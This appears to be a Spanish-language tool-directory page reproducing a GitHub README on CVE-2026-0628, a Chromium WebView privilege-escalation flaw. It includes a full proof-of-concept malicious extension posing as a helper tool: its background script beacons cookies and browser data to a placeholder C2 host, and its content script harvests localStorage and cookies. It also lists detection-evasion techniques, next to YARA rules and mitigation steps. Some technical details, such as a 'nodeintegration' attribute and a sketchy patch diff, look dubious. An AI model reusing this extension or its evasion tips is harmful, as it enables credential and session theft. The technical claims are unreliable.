Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation — Dissección técnica de CVE-2026-0628, una vulnerabilidad de escalada de privilegios en Chromium WebView, que incluye análisis de causa raíz, exploit PoC, reglas de detección y estrategias de mitigación. | Kitploit
Herramientas/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad WebAnálisis de MalwareForensia Digital
GitHubsastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation

Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Dissección técnica de CVE-2026-0628, una vulnerabilidad de escalada de privilegios en Chromium WebView, que incluye análisis de causa raíz, exploit PoC, reglas de detección y estrategias de mitigación.

Ver RepositorioSitio web
1hace 6 mesesAún no revisado

DOI = doi.org/10.5281/zenodo.18413764

ORCID = orcid.org/0009-0007-7728-256X

root@kitploit:~

README.md


# **CVE-2026-0628: Escalada de Privilegios en Chromium WebView (Suplantación de Origen) – Investigación Técnica y Prueba de Concepto**

**Autor:** Sastra Adi Wiguna (Purple Elite Teaming)
**Fecha de Investigación:** Enero 2026
**ID CVE:** CVE-2026-0628
**CVSS v3.1:** 8.8 (Alta)
**Versiones Afectadas:** Chromium < 143.0.7499.192
**Estado del Parche:** Parcheado en Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139

---

## **1. Resumen**

### **1.1 Propósito de la Investigación**
Este repositorio documenta **CVE-2026-0628**, una **vulnerabilidad de escalada de privilegios de alta severidad** en el mecanismo de aplicación de políticas WebView de Chromium. La vulnerabilidad permite que extensiones maliciosas **evadan las restricciones del sandbox**, inyecten scripts en **contextos privilegiados** (p. ej., `chrome://`) y **escalen privilegios** para ejecutar código arbitrario.

Esta investigación es **exclusivamente para fines de seguridad defensiva**, incluyendo:
- **Análisis de vulnerabilidades**
- **Ingeniería de detección**
- **Desarrollo de estrategias de mitigación**
- **Pruebas de penetración (solo en entornos autorizados)**

### **1.2 Aviso Legal**
- **Estrictamente para investigación académica y defensiva.**
- **No utilizar contra sistemas de producción sin autorización.**
- **Cumplir con todas las leyes aplicables y políticas de seguridad organizacionales.**
- **Parchear inmediatamente:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139.

---

## **2. Desglose Técnico**

### **2.1 Causa Raíz**
**Aplicación insuficiente de políticas** en la implementación de WebView de Chromium permite que las extensiones **escapen de los límites del sandbox** y accedan a **contextos DOM privilegiados**.

**Flujo Vulnerable:**
1. La extensión maliciosa declara el uso de WebView en `manifest.json`.
2. La extensión inyecta un payload HTML/JS manipulado mediante la etiqueta `<webview>`.
3. **Omisión de la validación de políticas de WebView** → Acceso a páginas privilegiadas (p. ej., `chrome://settings`).
4. **Ejecución de scripts arbitrarios** en contextos privilegiados.

**Vector CVSS:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 Arquitectura del Exploit**
#### **Plantilla de Extensión Maliciosa**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}

Vector de Inyección Crítico (payload.js)

root@kitploit:~
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Parámetro clave de omisión
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}

3. Evaluación de Impacto


4. Detección y Forensia

4.1 Regla YARA para Extensiones Maliciosas

root@kitploit:~
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}

4.2 Firmas de Eventos Sysmon

  • ID de Evento 1: chrome.exe → Creación sospechosa de WebView.
  • ID de Evento 3: Conexión de red → Extensión → C2 externo.
  • Registro: HKCU\Software\Google\Chrome\Extensions\[malicious_id].

5. Análisis del Parche y Vectores de Omisión

5.1 Diff de la Versión Corregida (Chrome 143.0.7499.192+)

root@kitploit:~
// Vulnerable (pre-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Verificación de política débil
}

// Parcheado
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Endurecimiento de la Política de Seguridad de Contenido
  }
}

5.2 Implementación de Mitigación

Plantilla GPO Empresarial

root@kitploit:~
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}

Script de Detección en Tiempo de Ejecución (PowerShell)

root@kitploit:~
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}

6. Exploit de Prueba de Concepto (PoC)

6.1 Estructura de Directorios

root@kitploit:~
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html

6.2 Archivos Principales

manifest.json (Manifiesto de Omisión)

root@kitploit:~
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}

background.js (Persistencia y Baliza C2)

root@kitploit:~
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}

content.js (Disparador e Inyección de WebView)

root@kitploit:~
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();

7. Reproducción en Laboratorio

7.1 Requisitos

  • Chrome vulnerable: 143.0.7499.191
  • SO: Windows 10/11 (se recomienda VM)
  • Herramientas: Burp Suite (proxy), REMnux (forensia)

7.2 Pasos

  1. Descargar Chrome 143.0.7499.191 (vulnerable).
  2. Iniciar con banderas:
    root@kitploit:~
    chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
    
  3. Cargar la extensión:
    • Navegar a chrome://extensions/.
    • Habilitar Modo de desarrollador.
    • Hacer clic en Cargar descomprimida → Seleccionar cve-2026-0628-poc/.
  4. Activar el exploit:
    • Navegar a chrome://new-tab-page/.
    • Observar la creación de WebView en DevTools.
  5. Monitorear el tráfico:
    • Burp Suite (localhost:8080) → Capturar la exfiltración hacia el C2.
  6. Verificar el éxito:
    • Pestaña de red → Baliza hacia your-c2-server.com.
    • Consola: "CVE-2026-0628 OWNED".

8. Técnicas de Evasión de Detección

  • Esteganografía: Codificar la exfiltración en píxeles de imagen.
  • Generación de dominios: DGA para rotación de C2.
  • Ataques de sincronización: Retrasar la ejecución 5-30 s después de la instalación.
  • Ofuscación del manifiesto: Codificar cadenas sensibles en Base64.

9. Mitigación y Flujo de Trabajo del Parche

  • Acción inmediata: Actualizar Chrome/Edge a las versiones parcheadas.
  • GPO empresarial:
    root@kitploit:~
    {
      "ExtensionInstallBlacklist": ["*"],
      "WebViewRestrictions": {
        "DisableWebView": true,
        "BlockNodeIntegration": true
      }
    }
    
  • Detección en tiempo de ejecución:
    root@kitploit:~
    # Escanear extensiones maliciosas
    Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
      Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
    

10. Análisis Forense

10.1 Comandos de Volatility3

root@kitploit:~
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/

10.2 Regla YARA para Volcados de Memoria

root@kitploit:~
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}

11. Conclusión

11.1 Hallazgos Clave

  • CVE-2026-0628 permite la escalada de privilegios mediante la omisión de políticas de WebView.
  • Impacto: Secuestro de sesión, robo de credenciales, movimiento lateral.
  • Mitigación: Parchear Chrome/Edge, aplicar restricciones GPO, monitorear extensiones maliciosas.

11.2 Recomendaciones

  • Parchear inmediatamente a Chrome ≥143.0.7499.192 o Edge ≥143.0.3650.139.
  • Implementar reglas YARA/Sysmon para la detección.
  • Restringir extensiones mediante GPO empresarial.
  • Realizar ejercicios de red team para validar las defensas.

12. Consideraciones Legales y Éticas

  • Solo uso autorizado.
  • No implementar en producción sin permiso explícito.
  • Reportar vulnerabilidades de manera responsable a los proveedores.

Contacto: Para preguntas de seguridad defensiva, contacte al autor a través de GitHub Issues.


© 2026 Sastra Adi Wiguna. Todos los derechos reservados.

root@kitploit:~
Descargar herramienta
Fase del AtaqueImpacto TécnicoImpacto EmpresarialMétricas CVSS
Instalación de la ExtensiónConsentimiento del usuario → PersistenciaVector de ingeniería socialUI:R (Requerida)
Omisión de WebViewEscape del sandbox → Contexto privilegiadoSecuestro de sesiónS:U → C:H/I:H/A:H
Inyección de ScriptManipulación del DOM → Exfiltración de datosRobo de credencialesPR:N (Sin privilegios)
PersistenciaScript en segundo plano → Baliza C2Preparación para movimiento lateralAC:L (Baja complejidad)